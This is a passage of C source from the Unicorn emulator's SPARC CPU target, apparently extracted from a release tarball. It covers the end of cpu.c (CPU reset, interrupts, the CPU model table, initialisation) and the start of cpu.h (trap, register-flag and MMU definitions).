but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" static void sparc_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); SPARCCPU *cpu = SPARC_CPU(s); SPARCCPUClass *scc = SPARC_CPU_GET_CLASS(cpu); CPUSPARCState *env = &cpu->env; scc->parent_reset(dev); memset(env, 0, offsetof(CPUSPARCState, end_reset_fields)); env->cwp = 0; #ifndef TARGET_SPARC64 env->wim = 1; #endif env->regwptr = env->regbase + (env->cwp * 16); CC_OP = CC_OP_FLAGS; #if !defined(TARGET_SPARC64) env->psret = 0; env->psrs = 1; env->psrps = 1; #endif #ifdef TARGET_SPARC64 env->pstate = PS_PRIV | PS_RED | PS_PEF; if (!cpu_has_hypervisor(env)) { env->pstate |= PS_AG; } env->hpstate = cpu_has_hypervisor(env) ? HS_PRIV : 0; env->tl = env->maxtl; env->gl = 2; cpu_tsptr(env)->tt = TT_POWER_ON_RESET; env->lsu = 0; #else env->mmuregs[0] &= ~(MMU_E | MMU_NF); env->mmuregs[0] |= env->def.mmu_bm; #endif env->pc = 0; env->npc = env->pc + 4; env->cache_control = 0; } static bool sparc_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { if (interrupt_request & CPU_INTERRUPT_HARD) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; if (cpu_interrupts_enabled(env) && env->interrupt_index > 0) { int pil = env->interrupt_index & 0xf; int type = env->interrupt_index & 0xf0; if (type != TT_EXTINT || cpu_pil_allowed(env, pil)) { cs->exception_index = env->interrupt_index; sparc_cpu_do_interrupt(cs); return true; } } } return false; } void cpu_sparc_set_id(CPUSPARCState *env, unsigned int cpu) { #if !defined(TARGET_SPARC64) env->mxccregs[7] = ((cpu + 8) & 0xf) << 24; #endif } static const sparc_def_t sparc_defs[] = { #ifdef TARGET_SPARC64 { .name = "Fujitsu Sparc64", .iu_version = ((0x04ULL << 48) | (0x02ULL << 32) | (0ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 4, .maxtl = 4, .features = CPU_DEFAULT_FEATURES, }, { .name = "Fujitsu Sparc64 III", .iu_version = ((0x04ULL << 48) | (0x03ULL << 32) | (0ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 5, .maxtl = 4, .features = CPU_DEFAULT_FEATURES, }, { .name = "Fujitsu Sparc64 IV", .iu_version = ((0x04ULL << 48) | (0x04ULL << 32) | (0ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Fujitsu Sparc64 V", .iu_version = ((0x04ULL << 48) | (0x05ULL << 32) | (0x51ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI UltraSparc I", .iu_version = ((0x17ULL << 48) | (0x10ULL << 32) | (0x40ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI UltraSparc II", .iu_version = ((0x17ULL << 48) | (0x11ULL << 32) | (0x20ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI UltraSparc IIi", .iu_version = ((0x17ULL << 48) | (0x12ULL << 32) | (0x91ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI UltraSparc IIe", .iu_version = ((0x17ULL << 48) | (0x13ULL << 32) | (0x14ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc III", .iu_version = ((0x3eULL << 48) | (0x14ULL << 32) | (0x34ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc III Cu", .iu_version = ((0x3eULL << 48) | (0x15ULL << 32) | (0x41ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_3, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc IIIi", .iu_version = ((0x3eULL << 48) | (0x16ULL << 32) | (0x34ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc IV", .iu_version = ((0x3eULL << 48) | (0x18ULL << 32) | (0x31ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_4, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc IV+", .iu_version = ((0x3eULL << 48) | (0x19ULL << 32) | (0x22ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_CMT, }, { .name = "Sun UltraSparc IIIi+", .iu_version = ((0x3eULL << 48) | (0x22ULL << 32) | (0ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_3, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc T1", /* defined in sparc_ifu_fdp.v and ctu.h */ .iu_version = ((0x3eULL << 48) | (0x23ULL << 32) | (0x02ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_sun4v, .nwindows = 8, .maxtl = 6, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_HYPV | CPU_FEATURE_CMT | CPU_FEATURE_GL, }, { .name = "Sun UltraSparc T2", /* defined in tlu_asi_ctl.v and n2_revid_cust.v */ .iu_version = ((0x3eULL << 48) | (0x24ULL << 32) | (0x02ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_sun4v, .nwindows = 8, .maxtl = 6, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_HYPV | CPU_FEATURE_CMT | CPU_FEATURE_GL, }, { .name = "NEC UltraSparc I", .iu_version = ((0x22ULL << 48) | (0x10ULL << 32) | (0x40ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, #else { .name = "Fujitsu MB86904", .iu_version = 0x04 << 24, /* Impl 0, ver 4 */ .fpu_version = 4 << 17, /* FPU version 4 (Meiko) */ .mmu_version = 0x04 << 24, /* Impl 0, ver 4 */ .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x00ffffc0, .mmu_cxr_mask = 0x000000ff, .mmu_sfsr_mask = 0x00016fff, .mmu_trcr_mask = 0x00ffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "Fujitsu MB86907", .iu_version = 0x05 << 24, /* Impl 0, ver 5 */ .fpu_version = 4 << 17, /* FPU version 4 (Meiko) */ .mmu_version = 0x05 << 24, /* Impl 0, ver 5 */ .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x000000ff, .mmu_sfsr_mask = 0x00016fff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI MicroSparc I", .iu_version = 0x41000000, .fpu_version = 4 << 17, .mmu_version = 0x41000000, .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x007ffff0, .mmu_cxr_mask = 0x0000003f, .mmu_sfsr_mask = 0x00016fff, .mmu_trcr_mask = 0x0000003f, .nwindows = 7, .features = CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | CPU_FEATURE_MUL | CPU_FEATURE_DIV | CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | CPU_FEATURE_FMUL, }, { .name = "TI MicroSparc II", .iu_version = 0x42000000, .fpu_version = 4 << 17, .mmu_version = 0x02000000, .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x00ffffc0, .mmu_cxr_mask = 0x000000ff, .mmu_sfsr_mask = 0x00016fff, .mmu_trcr_mask = 0x00ffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI MicroSparc IIep", .iu_version = 0x42000000, .fpu_version = 4 << 17, .mmu_version = 0x04000000, .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x00ffffc0, .mmu_cxr_mask = 0x000000ff, .mmu_sfsr_mask = 0x00016bff, .mmu_trcr_mask = 0x00ffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 40", /* STP1020NPGA */ .iu_version = 0x41000000, /* SuperSPARC 2.x */ .fpu_version = 0 << 17, .mmu_version = 0x00000800, /* SuperSPARC 2.x, no MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 50", /* STP1020PGA */ .iu_version = 0x40000000, /* SuperSPARC 3.x */ .fpu_version = 0 << 17, .mmu_version = 0x01000800, /* SuperSPARC 3.x, no MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 51", .iu_version = 0x40000000, /* SuperSPARC 3.x */ .fpu_version = 0 << 17, .mmu_version = 0x01000000, /* SuperSPARC 3.x, MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .mxcc_version = 0x00000104, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 60", /* STP1020APGA */ .iu_version = 0x40000000, /* SuperSPARC 3.x */ .fpu_version = 0 << 17, .mmu_version = 0x01000800, /* SuperSPARC 3.x, no MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 61", .iu_version = 0x44000000, /* SuperSPARC 3.x */ .fpu_version = 0 << 17, .mmu_version = 0x01000000, /* SuperSPARC 3.x, MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .mxcc_version = 0x00000104, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc II", .iu_version = 0x40000000, /* SuperSPARC II 1.x */ .fpu_version = 0 << 17, .mmu_version = 0x08000000, /* SuperSPARC II 1.x, MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .mxcc_version = 0x00000104, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "LEON2", .iu_version = 0xf2000000, .fpu_version = 4 << 17, /* FPU version 4 (Meiko) */ .mmu_version = 0xf2000000, .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x007ffff0, .mmu_cxr_mask = 0x0000003f, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_TA0_SHUTDOWN, }, { .name = "LEON3", .iu_version = 0xf3000000, .fpu_version = 4 << 17, /* FPU version 4 (Meiko) */ .mmu_version = 0xf3000000, .mmu_bm = 0x00000000, .mmu_ctpr_mask = 0xfffffffc, .mmu_cxr_mask = 0x000000ff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_TA0_SHUTDOWN | CPU_FEATURE_ASR17 | CPU_FEATURE_CACHE_CTRL | CPU_FEATURE_POWERDOWN | CPU_FEATURE_CASA, }, #endif }; static void sparc_cpu_set_pc(CPUState *cs, vaddr value) { SPARCCPU *cpu = SPARC_CPU(cs); cpu->env.pc = value; cpu->env.npc = value + 4; } static void sparc_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { SPARCCPU *cpu = SPARC_CPU(cs); cpu->env.pc = tb->pc; cpu->env.npc = tb->cs_base; } static bool sparc_cpu_has_work(CPUState *cs) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; return (cs->interrupt_request & CPU_INTERRUPT_HARD) && cpu_interrupts_enabled(env); } static void sparc_cpu_realizefn(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); SPARCCPU *cpu = SPARC_CPU(dev); CPUSPARCState *env = &cpu->env; env->version = env->def.iu_version; env->fsr = env->def.fpu_version; env->nwindows = env->def.nwindows; #if !defined(TARGET_SPARC64) env->mmuregs[0] |= env->def.mmu_version; cpu_sparc_set_id(env, 0); env->mxccregs[7] |= env->def.mxcc_version; #else env->mmu_version = env->def.mmu_version; env->maxtl = env->def.maxtl; env->version |= env->def.maxtl << 8; env->version |= env->def.nwindows - 1; #endif cpu_exec_realizefn(cs); } static void sparc_cpu_initfn(struct uc_struct *uc, CPUState *obj) { SPARCCPU *cpu = SPARC_CPU(obj); SPARCCPUClass *scc = SPARC_CPU_GET_CLASS(obj); CPUSPARCState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); if (scc->cpu_def) { env->def = *scc->cpu_def; } } static void sparc_cpu_class_init(struct uc_struct *uc, CPUClass *oc) { SPARCCPUClass *scc = SPARC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ scc->parent_reset = cc->reset; /* overwrite the CPUClass->reset to arch reset: x86_cpu_reset(). */ cc->reset = sparc_cpu_reset; cc->has_work = sparc_cpu_has_work; cc->do_interrupt = sparc_cpu_do_interrupt; cc->cpu_exec_interrupt = sparc_cpu_exec_interrupt; cc->set_pc = sparc_cpu_set_pc; cc->synchronize_from_tb = sparc_cpu_synchronize_from_tb; cc->tlb_fill_cpu = sparc_cpu_tlb_fill; cc->do_unaligned_access = sparc_cpu_do_unaligned_access; cc->get_phys_page_debug = sparc_cpu_get_phys_page_debug; cc->tcg_initialize = sparc_tcg_init; } SPARCCPU *cpu_sparc_init(struct uc_struct *uc) { SPARCCPU *cpu; CPUState *cs; CPUClass *cc; SPARCCPUClass *scc; cpu = malloc(sizeof(*cpu)); if (cpu == NULL) { return NULL; } memset(cpu, 0, sizeof(*cpu)); if (uc->cpu_model == INT_MAX) { #ifdef TARGET_SPARC64 uc->cpu_model = UC_CPU_SPARC64_SUN_ULTRASPARC_IV; // Sun UltraSparc IV #else uc->cpu_model = UC_CPU_SPARC32_LEON3; // Leon 3 #endif } else if (uc->cpu_model >= ARRAY_SIZE(sparc_defs)) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = cs; /* init CPUClass */ cpu_class_init(uc, cc); /* init SPARCCPUClass */ sparc_cpu_class_init(uc, cc); /* init CPUState */ cpu_common_initfn(uc, cs); /* init SPARC types scc->def */ scc = SPARC_CPU_CLASS(cc); scc->cpu_def = &sparc_defs[uc->cpu_model]; /* init SPARCCPU */ sparc_cpu_initfn(uc, cs); /* realize SPARCCPU */ sparc_cpu_realizefn(uc, cs); /* realize CPUState */ // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); return cpu; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/cpu.h���������������������������������������������������������������0000664�0000000�0000000�00000060647�14675241067�0017526�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef SPARC_CPU_H #define SPARC_CPU_H #include "qemu/bswap.h" #include "cpu-qom.h" #include "exec/cpu-defs.h" #if !defined(TARGET_SPARC64) #define TARGET_DPREGS 16 #else #define TARGET_DPREGS 32 #endif /*#define EXCP_INTERRUPT 0x100*/ /* Windowed register indexes. */ enum { WREG_O0, WREG_O1, WREG_O2, WREG_O3, WREG_O4, WREG_O5, WREG_O6, WREG_O7, WREG_L0, WREG_L1, WREG_L2, WREG_L3, WREG_L4, WREG_L5, WREG_L6, WREG_L7, WREG_I0, WREG_I1, WREG_I2, WREG_I3, WREG_I4, WREG_I5, WREG_I6, WREG_I7, WREG_SP = WREG_O6, WREG_FP = WREG_I6, }; /* trap definitions */ #ifndef TARGET_SPARC64 #define TT_TFAULT 0x01 #define TT_ILL_INSN 0x02 #define TT_PRIV_INSN 0x03 #define TT_NFPU_INSN 0x04 #define TT_WIN_OVF 0x05 #define TT_WIN_UNF 0x06 #define TT_UNALIGNED 0x07 #define TT_FP_EXCP 0x08 #define TT_DFAULT 0x09 #define TT_TOVF 0x0a #define TT_EXTINT 0x10 #define TT_CODE_ACCESS 0x21 #define TT_UNIMP_FLUSH 0x25 #define TT_DATA_ACCESS 0x29 #define TT_DIV_ZERO 0x2a #define TT_NCP_INSN 0x24 #define TT_TRAP 0x80 #else #define TT_POWER_ON_RESET 0x01 #define TT_TFAULT 0x08 #define TT_CODE_ACCESS 0x0a #define TT_ILL_INSN 0x10 #define TT_UNIMP_FLUSH TT_ILL_INSN #define TT_PRIV_INSN 0x11 #define TT_NFPU_INSN 0x20 #define TT_FP_EXCP 0x21 #define TT_TOVF 0x23 #define TT_CLRWIN 0x24 #define TT_DIV_ZERO 0x28 #define TT_DFAULT 0x30 #define TT_DATA_ACCESS 0x32 #define TT_UNALIGNED 0x34 #define TT_PRIV_ACT 0x37 #define TT_INSN_REAL_TRANSLATION_MISS 0x3e #define TT_DATA_REAL_TRANSLATION_MISS 0x3f #define TT_EXTINT 0x40 #define TT_IVEC 0x60 #define TT_TMISS 0x64 #define TT_DMISS 0x68 #define TT_DPROT 0x6c #define TT_SPILL 0x80 #define TT_FILL 0xc0 #define TT_WOTHER (1 << 5) #define TT_TRAP 0x100 #define TT_HTRAP 0x180 #endif #define PSR_NEG_SHIFT 23 #define PSR_NEG (1 << PSR_NEG_SHIFT) #define PSR_ZERO_SHIFT 22 #define PSR_ZERO (1 << PSR_ZERO_SHIFT) #define PSR_OVF_SHIFT 21 #define PSR_OVF (1 << PSR_OVF_SHIFT) #define PSR_CARRY_SHIFT 20 #define PSR_CARRY (1 << PSR_CARRY_SHIFT) #define PSR_ICC (PSR_NEG|PSR_ZERO|PSR_OVF|PSR_CARRY) #if !defined(TARGET_SPARC64) #define PSR_EF (1<<12) #define PSR_PIL 0xf00 #define PSR_S (1<<7) #define PSR_PS (1<<6) #define PSR_ET (1<<5) #define PSR_CWP 0x1f #endif #define CC_SRC (env->cc_src) #define CC_SRC2 (env->cc_src2) #define CC_DST (env->cc_dst) #define CC_OP (env->cc_op) /* Even though lazy evaluation of CPU condition codes tends to be less * important on RISC systems where condition codes are only updated * when explicitly requested, SPARC uses it to update 32-bit and 64-bit * condition codes. */ enum { CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ CC_OP_FLAGS, /* all cc are back in status register */ CC_OP_DIV, /* modify N, Z and V, C = 0*/ CC_OP_ADD, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_ADDX, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_TADD, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_TADDTV, /* modify all flags except V, CC_DST = res, CC_SRC = src1 */ CC_OP_SUB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_SUBX, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_TSUB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_TSUBTV, /* modify all flags except V, CC_DST = res, CC_SRC = src1 */ CC_OP_LOGIC, /* modify N and Z, C = V = 0, CC_DST = res */ CC_OP_NB, }; /* Trap base register */ #define TBR_BASE_MASK 0xfffff000 #if defined(TARGET_SPARC64) #define PS_TCT (1<<12) /* UA2007, impl.dep. trap on control transfer */ #define PS_IG (1<<11) /* v9, zero on UA2007 */ #define PS_MG (1<<10) /* v9, zero on UA2007 */ #define PS_CLE (1<<9) /* UA2007 */ #define PS_TLE (1<<8) /* UA2007 */ #define PS_RMO (1<<7) #define PS_RED (1<<5) /* v9, zero on UA2007 */ #define PS_PEF (1<<4) /* enable fpu */ #define PS_AM (1<<3) /* address mask */ #define PS_PRIV (1<<2) #define PS_IE (1<<1) #define PS_AG (1<<0) /* v9, zero on UA2007 */ #define FPRS_FEF (1<<2) #define HS_PRIV (1<<2) #endif /* Fcc */ #define FSR_RD1 (1ULL << 31) #define FSR_RD0 (1ULL << 30) #define FSR_RD_MASK (FSR_RD1 | FSR_RD0) #define FSR_RD_NEAREST 0 #define FSR_RD_ZERO FSR_RD0 #define FSR_RD_POS FSR_RD1 #define FSR_RD_NEG (FSR_RD1 | FSR_RD0) #define FSR_NVM (1ULL << 27) #define FSR_OFM (1ULL << 26) #define FSR_UFM (1ULL << 25) #define FSR_DZM (1ULL << 24) #define FSR_NXM (1ULL << 23) #define FSR_TEM_MASK (FSR_NVM | FSR_OFM | FSR_UFM | FSR_DZM | FSR_NXM) #define FSR_NVA (1ULL << 9) #define FSR_OFA (1ULL << 8) #define FSR_UFA (1ULL << 7) #define FSR_DZA (1ULL << 6) #define FSR_NXA (1ULL << 5) #define FSR_AEXC_MASK (FSR_NVA | FSR_OFA | FSR_UFA | FSR_DZA | FSR_NXA) #define FSR_NVC (1ULL << 4) #define FSR_OFC (1ULL << 3) #define FSR_UFC (1ULL << 2) #define FSR_DZC (1ULL << 1) #define FSR_NXC (1ULL << 0) #define FSR_CEXC_MASK (FSR_NVC | FSR_OFC | FSR_UFC | FSR_DZC | FSR_NXC) #define FSR_FTT2 (1ULL << 16) #define FSR_FTT1 (1ULL << 15) #define FSR_FTT0 (1ULL << 14) //gcc warns about constant overflow for ~FSR_FTT_MASK //#define FSR_FTT_MASK (FSR_FTT2 | FSR_FTT1 | FSR_FTT0) #ifdef TARGET_SPARC64 #define FSR_FTT_NMASK 0xfffffffffffe3fffULL #define FSR_FTT_CEXC_NMASK 0xfffffffffffe3fe0ULL #define FSR_LDFSR_OLDMASK 0x0000003f000fc000ULL #define FSR_LDXFSR_MASK 0x0000003fcfc00fffULL #define FSR_LDXFSR_OLDMASK 0x00000000000fc000ULL #else #define FSR_FTT_NMASK 0xfffe3fffULL #define FSR_FTT_CEXC_NMASK 0xfffe3fe0ULL #define FSR_LDFSR_OLDMASK 0x000fc000ULL #endif #define FSR_LDFSR_MASK 0xcfc00fffULL #define FSR_FTT_IEEE_EXCP (1ULL << 14) #define FSR_FTT_UNIMPFPOP (3ULL << 14) #define FSR_FTT_SEQ_ERROR (4ULL << 14) #define FSR_FTT_INVAL_FPR (6ULL << 14) #define FSR_FCC1_SHIFT 11 #define FSR_FCC1 (1ULL << FSR_FCC1_SHIFT) #define FSR_FCC0_SHIFT 10 #define FSR_FCC0 (1ULL << FSR_FCC0_SHIFT) /* MMU */ #define MMU_E (1<<0) #define MMU_NF (1<<1) #define PTE_ENTRYTYPE_MASK 3 #define PTE_ACCESS_MASK 0x1c #define PTE_ACCESS_SHIFT 2 #define PTE_PPN_SHIFT 7 #define PTE_ADDR_MASK 0xffffff00 #define PG_ACCESSED_BIT 5 #define PG_MODIFIED_BIT 6 #define PG_CACHE_BIT 7 #define PG_ACCESSED_MASK (1 << PG_ACCESSED_BIT) #define PG_MODIFIED_MASK (1 << PG_MODIFIED_BIT) #define PG_CACHE_MASK (1 << PG_CACHE_BIT) /* 3 <= NWINDOWS <= 32. */ #define MIN_NWINDOWS 3 #define MAX_NWINDOWS 32 #ifdef TARGET_SPARC64 typedef struct trap_state { uint64_t tpc; uint64_t tnpc; uint64_t tstate; uint32_t tt; } trap_state; #endif #define TARGET_INSN_START_EXTRA_WORDS 1 struct sparc_def_t { const char *name; target_ulong iu_version; uint32_t fpu_version; uint32_t mmu_version; uint32_t mmu_bm; uint32_t mmu_ctpr_mask; uint32_t mmu_cxr_mask; uint32_t mmu_sfsr_mask; uint32_t mmu_trcr_mask; uint32_t mxcc_version; uint32_t features; uint32_t nwindows; uint32_t maxtl; }; #define CPU_FEATURE_FLOAT (1 << 0) #define CPU_FEATURE_FLOAT128 (1 << 1) #define CPU_FEATURE_SWAP (1 << 2) #define CPU_FEATURE_MUL (1 << 3) #define CPU_FEATURE_DIV (1 << 4) #define CPU_FEATURE_FLUSH (1 << 5) #define CPU_FEATURE_FSQRT (1 << 6) #define CPU_FEATURE_FMUL (1 << 7) #define CPU_FEATURE_VIS1 (1 << 8) #define CPU_FEATURE_VIS2 (1 << 9) #define CPU_FEATURE_FSMULD (1 << 10) #define CPU_FEATURE_HYPV (1 << 11) #define CPU_FEATURE_CMT (1 << 12) #define CPU_FEATURE_GL (1 << 13) #define CPU_FEATURE_TA0_SHUTDOWN (1 << 14) /* Shutdown on "ta 0x0" */ #define CPU_FEATURE_ASR17 (1 << 15) #define CPU_FEATURE_CACHE_CTRL (1 << 16) #define CPU_FEATURE_POWERDOWN (1 << 17) #define CPU_FEATURE_CASA (1 << 18) #ifndef TARGET_SPARC64 #define CPU_DEFAULT_FEATURES (CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | \ CPU_FEATURE_MUL | CPU_FEATURE_DIV | \ CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | \ CPU_FEATURE_FMUL | CPU_FEATURE_FSMULD) #else #define CPU_DEFAULT_FEATURES (CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | \ CPU_FEATURE_MUL | CPU_FEATURE_DIV | \ CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | \ CPU_FEATURE_FMUL | CPU_FEATURE_VIS1 | \ CPU_FEATURE_VIS2 | CPU_FEATURE_FSMULD | \ CPU_FEATURE_CASA) enum { mmu_us_12, // Ultrasparc < III (64 entry TLB) mmu_us_3, // Ultrasparc III (512 entry TLB) mmu_us_4, // Ultrasparc IV (several TLBs, 32 and 256MB pages) mmu_sun4v, // T1, T2 }; #endif #define TTE_VALID_BIT (1ULL << 63) #define TTE_NFO_BIT (1ULL << 60) #define TTE_IE_BIT (1ULL << 59) #define TTE_USED_BIT (1ULL << 41) #define TTE_LOCKED_BIT (1ULL << 6) #define TTE_SIDEEFFECT_BIT (1ULL << 3) #define TTE_PRIV_BIT (1ULL << 2) #define TTE_W_OK_BIT (1ULL << 1) #define TTE_GLOBAL_BIT (1ULL << 0) #define TTE_NFO_BIT_UA2005 (1ULL << 62) #define TTE_USED_BIT_UA2005 (1ULL << 47) #define TTE_LOCKED_BIT_UA2005 (1ULL << 61) #define TTE_SIDEEFFECT_BIT_UA2005 (1ULL << 11) #define TTE_PRIV_BIT_UA2005 (1ULL << 8) #define TTE_W_OK_BIT_UA2005 (1ULL << 6) #define TTE_IS_VALID(tte) ((tte) & TTE_VALID_BIT) #define TTE_IS_NFO(tte) ((tte) & TTE_NFO_BIT) #define TTE_IS_IE(tte) ((tte) & TTE_IE_BIT) #define TTE_IS_USED(tte) ((tte) & TTE_USED_BIT) #define TTE_IS_LOCKED(tte) ((tte) & TTE_LOCKED_BIT) #define TTE_IS_SIDEEFFECT(tte) ((tte) & TTE_SIDEEFFECT_BIT) #define TTE_IS_SIDEEFFECT_UA2005(tte) ((tte) & TTE_SIDEEFFECT_BIT_UA2005) #define TTE_IS_PRIV(tte) ((tte) & TTE_PRIV_BIT) #define TTE_IS_W_OK(tte) ((tte) & TTE_W_OK_BIT) #define TTE_IS_NFO_UA2005(tte) ((tte) & TTE_NFO_BIT_UA2005) #define TTE_IS_USED_UA2005(tte) ((tte) & TTE_USED_BIT_UA2005) #define TTE_IS_LOCKED_UA2005(tte) ((tte) & TTE_LOCKED_BIT_UA2005) #define TTE_IS_SIDEEFFECT_UA2005(tte) ((tte) & TTE_SIDEEFFECT_BIT_UA2005) #define TTE_IS_PRIV_UA2005(tte) ((tte) & TTE_PRIV_BIT_UA2005) #define TTE_IS_W_OK_UA2005(tte) ((tte) & TTE_W_OK_BIT_UA2005) #define TTE_IS_GLOBAL(tte) ((tte) & TTE_GLOBAL_BIT) #define TTE_SET_USED(tte) ((tte) |= TTE_USED_BIT) #define TTE_SET_UNUSED(tte) ((tte) &= ~TTE_USED_BIT) #define TTE_PGSIZE(tte) (((tte) >> 61) & 3ULL) #define TTE_PGSIZE_UA2005(tte) ((tte) & 7ULL) #define TTE_PA(tte) ((tte) & 0x1ffffffe000ULL) /* UltraSPARC T1 specific */ #define TLB_UST1_IS_REAL_BIT (1ULL << 9) /* Real translation entry */ #define TLB_UST1_IS_SUN4V_BIT (1ULL << 10) /* sun4u/sun4v TTE format switch */ #define SFSR_NF_BIT (1ULL << 24) /* 